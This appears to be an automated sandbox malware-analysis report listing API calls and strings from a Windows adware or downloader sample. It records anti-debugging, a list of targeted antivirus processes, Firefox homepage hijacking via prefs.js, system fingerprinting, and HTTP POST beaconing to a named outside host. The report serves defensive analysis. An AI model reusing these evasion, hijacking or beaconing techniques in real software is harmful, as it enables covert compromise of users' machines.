                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00466D7E
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00466D8D
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00466DB5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466DF7
                                                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(?,00000000), ref: 00466E0C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466E3B
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00598088), ref: 00466EFC
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00466F1B
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00598088), ref: 00466F3C
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00598088), ref: 00466F8F
                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00466F9A
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,00000000,00000020,?,00000800), ref: 004670B8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004670ED
                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 004670FC
                                                                                                                                                                                                          • RasEnumConnectionsW.RASAPI32(00000000,00000000,00000000,?), ref: 00467149
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0046715A
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00467161
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0046719C
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 004671A3
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers), ref: 004671C1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004671C8
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 00467211
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$EnterHeapLeaveProcess$CurrentHandleInit_thread_footerInitializeModuleTime$AllocateCheckConnectionsDebuggerDispatcherEnumExceptionFreeInformationPresentRemoteSystemUserVersionZone__onexit
                                                                                                                                                                                                          • String ID: 2345safetray.exe$360tray.exe$HipsDaemon.exe$HipsTray.exe$IsWow64Process$RtlGetNtVersionNumbers$baiduantray.exe$gerP$kernel32$kxescore.exe$mati$msmpeng.exe$ntdll.dll$on$qqpcrtp.exe$qqpctray.exe$wwww$zhudongfangyu.exe

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,EFE0703F,?,00000000), ref: 00484346
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00484353
                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00484360
                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 0048436B
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlInitializeCriticalSection.NTDLL(00597CEC), ref: 0041BD0E
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: __Init_thread_footer.LIBCMT ref: 0041BD2A
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlEnterCriticalSection.NTDLL(00597CEC), ref: 0041BD45
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlLeaveCriticalSection.NTDLL(00597CEC), ref: 0041BD9B
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,RtlGetNtVersionNumbers), ref: 004843A8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004843AF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048449D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004844F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048455A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004845B6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00484675
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004846F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048499B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004849DF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00484A23
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$HandleInfoModuleSystem$EnterInit_thread_footerInitializeLeaveNative
                                                                                                                                                                                                          • String ID: Avai$Content-Type:application/x-www-form-urlencoded$GetNativeSystemInfo$Mozilla/5.0 (compatible; MSIE 9.0; Windows NT %d.%d; WOW%d; Trident/5.0)$POST$RtlGetNtVersionNumbers$WinH$WinH$dlk$ers$kernel32.dll$labl$ntdll$onne$pen$spon$ttpC$ttpO
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004062B9
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406423
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,00000011,00000000,\Mozilla\Firefox\,00000011,?,00000000,?), ref: 00406430
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406513
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,0000000C,00000000,profiles.ini,0000000C,00000000), ref: 00406520
                                                                                                                                                                                                          • GetPrivateProfileSectionNamesA.KERNEL32(?,000007D0,00000000), ref: 00406561
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,Default,00000000,?,00000104,00000000), ref: 00406899
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406A73
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,00000009,00000000,\prefs.js,00000009,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00406A80
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00000000,Default,00000000,00000000), ref: 00406BCA
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,Path,00000000,?,00000104,00000000), ref: 00406C7A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406E53
                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004072E4
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Section$Critical$AddressProc$PrivateProfile$ExistsFilePath$EnterInit_thread_footerInitializeLeaveString$Ios_base_dtorNamesstd::ios_base::_
                                                                                                                                                                                                          • String ID: ");$)@$1@$Default$Install$Path$Profile$\Mozilla\Firefox\$\prefs.js$about:$erPa$profiles.ini$user_pref("browser.startup.homepage", "
                                                                                                                                                                                                          • API String ID: 1618428692-886994478
                                                                                                                                                                                                          • Opcode ID: 6fe38041be1fdfc615b5ce297cc08eeef60a7be6911b008d6ab6d34982a8a5a9
                                                                                                                                                                                                          • Instruction ID: cf5b45e382433dad7b66343c8106350e14a4410f024a3f984de5edf9a9f8b7f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fe38041be1fdfc615b5ce297cc08eeef60a7be6911b008d6ab6d34982a8a5a9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63B2A071E002199FDB24CF68CC44BDEBBB5AF46304F1481A9D409B7681DB79AAC4CF96

Control-flow Graph: function starting at 00467C10
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • gethostbyname.WS2_32(w.nanweng.cn), ref: 00467D74
                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00467D8E
                                                                                                                                                                                                          • htons.WS2_32(00000050), ref: 00467DB7
                                                                                                                                                                                                          • connect.WS2_32(00000000,?,00000010), ref: 00467DE1
                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001005,?), ref: 00467E0D
                                                                                                                                                                                                          • setsockopt.WS2_32(00000000,0000FFFF,00001006,00000BB8,00000004), ref: 00467E27
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 00468283
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 00468299
                                                                                                                                                                                                            • Part of subcall function 004681F0: ___from_strstr_to_strchr.LIBCMT ref: 004682E2
                                                                                                                                                                                                            • Part of subcall function 004833E0: MultiByteToWideChar.KERNEL32(000003A8,00000000,-00000808,000000FF,00000000,00000000,?,?,?,-00000808,?,0043952F,00000000,00000000,?), ref: 0048340F
                                                                                                                                                                                                            • Part of subcall function 004833E0: MultiByteToWideChar.KERNEL32(000003A8,00000000,-00000808,000000FF,00000000,?,?,?,?,?,?,?,?), ref: 00483446
                                                                                                                                                                                                            • Part of subcall function 004833E0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0048345E
                                                                                                                                                                                                          • send.WS2_32(00000000,?,?,00000000), ref: 00467FEF
                                                                                                                                                                                                          • recv.WS2_32(00000000,?,00001000,00000000), ref: 00468027
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 00468032
                                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 0046803E
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 00468047
                                                                                                                                                                                                          • Sleep.KERNEL32(0000012C,?,?,?,0054AF36,000000FF), ref: 00468058
                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 0046806B
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0046808C
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 004680A4
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide___from_strstr_to_strchrclosesocket$Sleep_strstrsetsockopt$connectgethostbynamehtonsrecvsendsocket
                                                                                                                                                                                                          • String ID: &sig$&type=%d$/qy/ov$/qy/sv$HTTP/1.0$HTTP/1.1$POST %s HTTP/1.1Host: %s Content-Length: %d Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencoded$XNtu$w.nanweng.cn
                                                                                                                                                                                                          • API String ID: 293188133-3395050707
                                                                                                                                                                                                          • Opcode ID: 7e932a45503a7cf9c367a48e5592eb9f7211bb9af79cba3000aa024051e5d15c
                                                                                                                                                                                                          • Instruction ID: 20ad16803cbc53e3b9e6f1a94dfd60e8fc27be4d45141a1dc5012682db642f54
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e932a45503a7cf9c367a48e5592eb9f7211bb9af79cba3000aa024051e5d15c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20E1C1719002299BEB20DF54CC4DBDEBBB4BF69304F0141EAE609A7281EB745AC9CF55

Control-flow Graph: function starting at 004886E0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00488750
                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004887C0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00488821
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 00488830
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00488846
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(info,time,00000000,?,00000014,?), ref: 00488877
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(info,install,00000000,?), ref: 004888C9
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(info,round,00000001,?), ref: 004888E0
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,round,?,?), ref: 0048892B
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578800,?), ref: 0048894C
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578624,?), ref: 00488972
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,time,?,?), ref: 004889C9
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,round,00578800,?), ref: 004889E1
                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(info,install,00578624,?), ref: 00488A09
Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$String$Write$CriticalSection$AddressFileProc$AttributesEnterExistsInit_thread_footerInitializeLeaveLocalPathTime
                                                                                                                                                                                                          • String ID: %d-%d-%d$\roundinfo.ini$erPa$info$install$round$time
                                                                                                                                                                                                          • API String ID: 3222017063-1215182308
                                                                                                                                                                                                          • Opcode ID: 1a77383c345253648a27d2d35622dfc4e6db949501e5251d8b5293ddfabaf069
                                                                                                                                                                                                          • Instruction ID: 74520b6e4be4bcd6b7e63c33a4990e336f2dfd45e9c279385226847379a961ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a77383c345253648a27d2d35622dfc4e6db949501e5251d8b5293ddfabaf069
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F791F871E40218AADB10DB64EC46FEEBBBCFF14714F404156F509E2180EF75AA88DB55

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,75920E50), ref: 0046A5F0
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0046A60A
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0046A617
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0046A621
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,DownLoadFrame_splash,00000000,960A0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0046A63E
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000087,ZIP), ref: 0046A65D
                                                                                                                                                                                                          • FindResourceW.KERNEL32(00000000), ref: 0046A660
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0046A674
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000), ref: 0046A677
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?), ref: 0046A68B
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000), ref: 0046A68E
                                                                                                                                                                                                          • FreeResource.KERNEL32(?), ref: 0046A6C4
                                                                                                                                                                                                            • Part of subcall function 00490850: CoInitialize.OLE32(00000000), ref: 00490862
                                                                                                                                                                                                            • Part of subcall function 004909A0: IsWindow.USER32(?), ref: 004909AE
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule$Resource$LoadWindow$ClassCreateCursorFindFreeInitializeRegisterSizeof
                                                                                                                                                                                                          • String ID: 0$0xW$DownLoadFrame_splash$ZIP$start_window
                                                                                                                                                                                                          • API String ID: 909464850-2096845513
                                                                                                                                                                                                          • Opcode ID: d8ad461c0631003e10f27412f44cfaa4357ae0d26e70c484f9914ac28b92c4c6
                                                                                                                                                                                                          • Instruction ID: ad9b6c04108eb9a248668a967f6ccfc5f882ad1d50095b89f64277dc50d21b5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8ad461c0631003e10f27412f44cfaa4357ae0d26e70c484f9914ac28b92c4c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55419271A40305BBDB10AFA5EC4AF9FBFB8FF45705F104025F904AA291EA74D510DBA6

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(005980E4), ref: 0048BE69
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0048BE85
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(005980E4), ref: 0048BEA6
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0054C9B4,7591F550), ref: 0048BF19
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0048BF36
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(005980E4), ref: 0048BF5B
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(00000020,EFE0703F,00000000,00827338,7591F550), ref: 0048BF66
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0048BFBE
                                                                                                                                                                                                          • _strstr.LIBCMT ref: 0048BFD0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$_strstr$AddressInit_thread_footerInitializeLibraryLoadMemoryProcProtectVirtual__onexit
                                                                                                                                                                                                          • String ID: .dll$0F$@F$Virtual$d3d9$d3d9.dll
                                                                                                                                                                                                          • API String ID: 3498987271-3011228226
                                                                                                                                                                                                          • Opcode ID: 2f6fec5cb7b27c4d206ec02e00f4b99b2f6c7e52b2bfc0d404402d38f77e4284
                                                                                                                                                                                                          • Instruction ID: f15275ee4044624cbc07a93cf487b0c652e3cd363e09185a1649f875cbd55c32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6fec5cb7b27c4d206ec02e00f4b99b2f6c7e52b2bfc0d404402d38f77e4284
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F751E2B0900215DFDB10DF68DC49BAEBBB4FF09704F00856AE618A7291DB749A48CFA4

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00410886
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004108D9
                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,?,?,?), ref: 004108EE
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00410961
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 004109E9
                                                                                                                                                                                                          • CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00410A18
                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 00410B0A
                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 00410BD6
                                                                                                                                                                                                          • CoUninitialize.COMBASE ref: 00411137
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,?), ref: 00411145
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00411154
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalFindSection$AddressFileInitializeProc$CloseCreateEnterFirstFromInit_thread_footerInstanceLeaveListNextPathUninitialize_wcschr_wcsrchr
                                                                                                                                                                                                          • String ID: *.lnk$erLo$istW
                                                                                                                                                                                                          • API String ID: 2365766609-1183018039
                                                                                                                                                                                                          • Opcode ID: 756cb243502ccf9dcbfde1438c42cb77981b3990fb4c093f882ea49872d860d3
                                                                                                                                                                                                          • Instruction ID: a0b16b1e9ac4d51bb1c80a6feb5eb2be886ae33204ab1d23e24a08d4a010e1f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 756cb243502ccf9dcbfde1438c42cb77981b3990fb4c093f882ea49872d860d3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A428C719002599FDB24DF24CD85BDAB7B5AF44304F0445EAE509BB291EBB4AE88CF90
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0048FD9E
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048FDD2
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 0048FDEF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0048FE09
                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0048FE2B
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0048FEFA
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressLibraryProc$AdaptersDirectoryEnterFreeInfoInit_thread_footerInitializeLeaveLoadSystem
                                                                                                                                                                                                          • String ID: Appe$GetAdaptersInfo$Path$iphlpapi.dll
                                                                                                                                                                                                          • API String ID: 1616508286-1552646832
                                                                                                                                                                                                          • Opcode ID: 1edd6e4c4d1f834106fb67e53f20c82a667814674a90d2a2a0b6453cc7e3a85a
                                                                                                                                                                                                          • Instruction ID: 600854405f1a26696b3c7de736002c1e2b6794db6764d014896bd2a219028a9b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1edd6e4c4d1f834106fb67e53f20c82a667814674a90d2a2a0b6453cc7e3a85a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E51F271A002599FCB24DFB8C8546EEBBB5AF16300F0445EBE45DE7242DB349A88CF65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00483A7B
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseHandleProcess32$AddressCreateEnterFirstInit_thread_footerInitializeLeaveNextProcSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: Snap$shot
                                                                                                                                                                                                          • API String ID: 241911490-4032188263
                                                                                                                                                                                                          • Opcode ID: 3b025c79f9221de9c3128e3db336f9eff6532691b060f109fd76236a8ef8a551
                                                                                                                                                                                                          • Instruction ID: bcfc7a51d13a840dfb915e2186f7738b2a9a8e2f9ecd4835eebd97d0d536948a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b025c79f9221de9c3128e3db336f9eff6532691b060f109fd76236a8ef8a551
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 013184356097419BD320EF68DC897AFB7D8EFC5715F00491EF99DC2280EB74950487A6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F85D
                                                                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,00000000,0000000C,?,00000800,00000000,00000000), ref: 0048F8D0
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FA19
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0048FA20
                                                                                                                                                                                                          Similarity
